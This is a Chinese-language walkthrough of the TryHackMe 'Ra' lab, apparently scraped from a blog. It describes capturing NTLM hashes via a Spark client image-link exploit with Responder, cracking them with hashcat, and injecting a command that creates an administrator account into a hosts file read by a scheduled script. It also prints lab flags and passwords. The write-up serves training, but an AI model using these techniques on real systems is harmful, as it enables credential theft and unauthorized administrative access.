tryhackme-WindCrop
WindCrop
文章目录
- WindCrop
- Ra
- Task1 Ra
Ra
Task1 Ra
nmap扫描发现靶机开启端口很多,靶机处在域中,域名为fire.windcorp.thm
80页面发现主网页,在网页源代码中有“Our IT support-staff”项中泄露了一些域用户账户
“reset password”页面需要将靶机IP与域名写入hosts文件,才能正常访问;
重置密码的提示问题中有最喜欢宠物的名字,网页上只有Lily抱着宠物,通过图片名称猜测用户名为lilyle,宠物名为Sparky.
lilyle密码重置为
1.Flag1
使用lilyle:ChangeMe#1234登录SMB,在共享目录Shared下发现Flag 1.txt,得到flag1为THM{466d52dc75a277d6c3f6c6fcbc716d6b62420f48};
2.Flag2
下载共享目录下的spark_2_8_3.exe,使用lilyle:ChangeMe#1234登录成功
Jabber(XMPP) – 开源Linux即时通讯服务协议,端口5262
openfire – java编写的XMPP服务器,9090端口发现openfire登录页面
spark – XMPP协议客户端
https://github.com/theart42/cves/blob/master/cve-2020-12772/CVE-2020-12772.md spark2.8.3存在漏洞CVE-2020-12772,向用户发送指向任意IP的无效图片链接,服务器会发送该用户的NTLM哈希。
从网页来看,只有Buse Candan用户在线,可以发送消息;
使用Responder监听网卡,运行 python3 Responder.py -I tun0开启监听
向用户Buse@fire.wincorp.thm发送消息<img src="http://本机IP/image.jpg">
成功获取buse用户的NTLM哈希,使用hashcat破解,模式使用5600,结果为uzunLM+3131
使用Evil-winRM登录成功后,在C:\Users\buse\Desktop目录下找到flag 2,得到Flag 2为
3.Flag3
查看文件系统发现script目录,其中有checkservers.ps1和log.txt,查看log.txt发现脚本文件经常运行。
读取checkservers.ps1文件,关注注释会读取一个hosts文件,但这个文件属于其他用户,我们无权查看;
# Read the File with the Hosts every cycle, this way to can add/remove hosts
# from the list without touching the script/scheduled task,
# also hash/comment (#) out any hosts that are going for maintenance or are down.
get-content C:\Users\brittanycr\hosts.txt | Where-Object {!($_ -match "#")} |
whoami /priv – 查看用户权限,发现拥有修改账户的权限,直接更改brittanycr用户的密码,尝试将用户添加至管理员组,无法成功。
因为整个Users目录都被共享,使用smbclient以brittanycr用户登录,修改hosts.txt文件
在hosts.txt文件后添加;net user zhang Admin123456 /add;net group Administrators zhang /add,新建用户zhang并将用户加入管理员组;
使用Evil-winRM登录新建账号zhang,在C:\Users\Administrator\Desktop目录下找到Flag3.txt,得到flag3为THM{ba3a2bff2e535b514ad760c283890faae54ac2ef}
inistrator\Desktop目录下找到Flag3.txt,得到flag3为THM{ba3a2bff2e535b514ad760c283890faae54ac2ef}
tryhackme-WindCrop相关推荐
- TryHackMe学习笔记-Windows PrivEsc Arena
文章目录 Task 1 Connecting to TryHackMe network Task 2 Deploy the vulnerable machine Task 3 Registry Esc ...
- tryhackme圣诞挑战2021-Advent of Cyber 3-day2-越权漏洞,修改cookie
文章目录 背景 开始学习! HTTPS GET Cookies cookie的组成成分 操纵cookie 答题 背景 McSkidy需要检查其他员工是否被入侵了,但是员工的信息被黑了,你能修补回来然后 ...
- TryHackMe学习笔记-The Cod Caper
文章目录 概述 端口扫描 80端口漏洞利用 Web页面访问 目录扫描 SQL注入 命令执行 - 初始立足点 敏感文件查找 LinEnum 提权 gdb 利用pwntools溢出 hashcat破解ha ...
- TryHackMe | Blue Writeup (超干货详细msf渗透使用指南)
文章目录 前期准备 Task1 Recon scan the mechine How many ports are open with a port number under 1000? What i ...
- TryHackMe新手村
注册是需要谷歌的,需要特殊上网手段. TryHackMe 最近在外网发现了一个在线黑客学习网站:TryHackMe ,缺点是好像需要一些上网技巧,而且全英,免费用户每天只能用一小时,付费(大概一个月6 ...
- SQL注入(基于 tryhackme 的讲解)
一.什么是SQL注入 SQL注入攻击(SQL Injection),简称注入攻击.SQL注入,被广泛用于非法获取网站控制权,是发生在应用程序的数据库层上的安全漏洞.在设计程序时,忽略了对输入字符串中夹 ...
- 【Tryhackme】Hacker of the Hill #1
免责声明 本文渗透的主机经过合法授权.本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责. ...
- Tryhackme blue
前提 openvpn连入内网: 下载配置文件,链接内网后启动靶机 任务1 主机扫描 command:nmap -sV -vv --script vuln 10.10.78.216 任务2 启动msf ...
- Tryhackme -Skynet(考点:smb 密码爆破 cuppa RFI cronjob - tar提权)
1 扫描 忘了截图了,就是445 smb和80http 重要,一个进去找敏感文件,另一个进去搜集信息. 2 web信息搜集 gobuster扫gobuster dir -u http://10.10. ...
- TryHackMe - Dav靶场
Dav boot2root machine for FIT and bsides guatemala CTF 0x01 信息收集 常规Nmap扫描目标机器收集端口开放服务信息,只开放了一个端口 0x0 ...
最新文章
- Lync与Exchange 2013 UM集成:Exchange 配置
- 笔记本电脑怎么清理灰尘_用了这么多年电脑,你该清理清理这个,将会又快又流畅...
- 网速,果然如此!| 每日趣闻
- micropython 模块_MicroPython添加Module(一)
- 关于金蝶k3 wise供应生门户登陆界面屏蔽业务账套多余功能模块设置方法
- @valid注解_springboot使用自定义注解对接口参数校验
- 手机版ziperello_Ziperello
- java.lang.ExceptionInInitializerError的原因
- Codeforces Beta Round #19 D. Points
- 数据库编程1 Oracle 过滤 函数 分组 外连接 自连接
- 灵魂一问-如何彻底防止APK反编译?成功定级腾讯T3-2
- 剑指offer python版 最长不含重复字符的子字符
- 帆软函数TOIMAGE应用
- Java开发笔记(一百四十四)实现FXML对应的控制器
- Java枚举介绍_java枚举使用详细介绍及实现
- python爬虫动态加载_简单Python爬虫,动态加载问题
- Python安装包下载、环境配置与工具包安装教程(详细版)
- 苹果cms新手快速入门常见问题汇总及解决教程
- Linux直接在通过终端打开图片文件
- 总结Criteria的简要使用概述(Hibernate5.2+)